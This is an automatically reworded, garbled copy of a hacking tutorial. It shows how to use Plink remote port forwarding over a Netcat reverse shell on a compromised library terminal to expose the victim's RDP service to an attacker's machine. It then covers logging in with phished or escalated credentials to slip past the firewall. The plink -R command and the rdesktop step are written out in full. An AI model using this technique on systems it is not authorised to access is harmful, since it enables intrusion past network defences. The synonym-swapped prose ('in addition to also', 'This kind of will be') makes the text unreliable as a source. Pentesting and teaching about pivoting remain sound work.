2 weeks ago
38 Views

How to Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed « Null Byte :: WonderHowTo


Local port forwarding will be Great when you want to use SSH to pivot into a non-routable network. nevertheless if you want to access services on a network when you can’t configure port-forwarding on a router in addition to also don’t have VPN access to the network, remote port forwarding will be the way to go.

Remote port forwarding excels in situations where you want access to a service on an internal network in addition to also have gained control of a machine on in which network via a reverse shell of some kind. Whether you’re a pentester or system admin, This kind of will be a Great thing to know about.

For example, let’s say you compromise a public terminal within the local library in addition to also get some credentials. You install a persistent reverse shell of some sort, which communicates back to your machine, nevertheless you don’t have access to some other services on the machine. The victim machine might have an SQL instance configured on localhost only in which you want access to, or maybe you want to access the remote desktop. Maybe the network will be hosting some sort of admin panel you’d like to poke around in. Whatever This kind of will be you want, a compromised host in addition to also SSH will get you in.

The Situation

The shell will be a Netcat connection running cmd.exe. The user “bob” will be not a privileged user. Through prior information gathering, I know in which the user “barrow” will be a privileged user, in addition to also I also know in which This kind of machine features a remote desktop connection available.

Step 1: Install Plink

Plink will be a Windows command line SSH client. This kind of will be included with Kali Linux within the /usr/share/windows-binaries/ directory. This kind of can also be downloaded via the developer (look for the plink.exe file).

Step 2: Configure Remote Port Forwarding

Using my Netcat shell in addition to also plink.exe, I set up a remote port forward to my attacking machine via my victim machine by typing the following into the reverse shell I have established via my victim machine.

plink attackingMachine -R 4000:127.0.0.1:3389

The syntax will be similar to SSH. Using the -R option tells Plink to connect to the attacking machine in addition to also bind a channel on port 4000 (I arbitrarily selected port 4000 — you can select any port). The next portion in between the colons defines what service will be served to port 4000 on the attacking machine. In This kind of case, the victim machine’s port 3389. Once This kind of command will be entered, I will log in with my credentials to my attacking machine. today, my attacking machine has access to the remote desktop service on the victim machine on my localhost port 4000.

If you’re paying attention, you may have noticed in which I used the localhost address on the victim machine. This kind of can be useful for port forwarding services in which are generally constrained to localhost access only, such as mySQL.

Step 3: Log into a Remote Desktop

With This kind of running on my Netcat shell, I connect to my victim machine’s remote desktop service using the rdesktop command. The following command uses the remote desktop protocol to connect to localhost port 4000 where my victim machine will be forwarding its local port 3389.

rdesktop localhost:4000

All in which’s left to do will be use a known credential to log into Windows, either phished or gained via privilege escalation. via here, I have full administrative access to the system, despite the system’s gateway dropping all inbound connection requests. I also retained my initial shell connection, which will be always important to me. Shells can be a lot easier to lose than they are to get back.

SSH will be an excellent tool for pivoting in networks, nevertheless This kind of’s not limited to penetration testing. Remote port forwarding can provide you access to services on a machine in which might normally be inaccessible. This kind of can be useful if you want to share your services with networks in which normally might not be able to reach them. For example, if you need to temporarily connect to a service at work via your home nevertheless the firewall will be dropping all inbound packets. In some cases, setting up a reverse SSH tunnel will be easier than port forwarding a consumer-grade router.

If you have any questions or comments, feel free to post. You can also reach me on Twitter @0xBarrow. in addition to also as always, follow Null Byte on social media to stay up to date on all of the greatest hacking guides on the web.

Cover image in addition to also screenshots by Barrow/Null Byte

Don’t Miss: How to Use Pupy, a Remote Access Tool for Linux

Don’t Miss: How to Use Netcat, the Swiss Army Knife of Hacking Tools

Don’t Miss: How to Use SSH Local Port Forwarding to Pivot into Restricted Networks


Leave a Comment

Your email address will not be published. Required fields are marked *

16 − nine =